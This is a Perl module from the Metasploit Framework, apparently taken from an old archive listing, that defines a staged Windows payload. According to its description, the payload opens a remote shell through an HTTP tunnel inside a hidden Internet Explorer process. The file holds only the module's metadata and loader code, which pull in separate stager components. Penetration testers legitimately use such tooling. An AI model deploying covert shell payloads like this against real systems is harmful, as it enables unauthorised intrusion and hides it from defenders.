home *** CD-ROM | disk | FTP | other *** search
-
- ##
- # This file is part of the Metasploit Framework and may be redistributed
- # according to the licenses defined in the Authors field below. In the
- # case of an unknown or missing license, this file defaults to the same
- # license as the core Framework (dual GPLv2 and Artistic). The latest
- # version of the Framework can always be obtained from metasploit.com.
- ##
-
- package Msf::Payload::win32_passivex_stg;
-
- use strict;
- use base 'Msf::PayloadComponent::Windows::ia32::PipedShellStage';
-
- my $info =
- {
- 'Name' => 'Windows Staged PassiveX Shell',
- 'Version' => '$Revision: 1.1 $',
- 'Description' => 'Spawn a shell via an HTTP tunnel through a hidden IEXPLORE.EXE',
- 'Multistage' => 1,
- 'Authors' => [ 'skape <mmiller [at] hick.org>', ],
- };
-
- sub _Load
- {
- Msf::PayloadComponent::Windows::ia32::PipedShellStage->_Import('Msf::PayloadComponent::Windows::ia32::PassiveXStager');
-
- __PACKAGE__->SUPER::_Load();
- }
-
- sub new
- {
- my $class = shift;
- my $hash = @_ ? shift : { };
- my $self;
-
- _Load();
-
- $hash = $class->MergeHashRec($hash, {'Info' => $info});
- $self = $class->SUPER::new($hash, @_);
-
- return($self);
- }
-
- 1;
-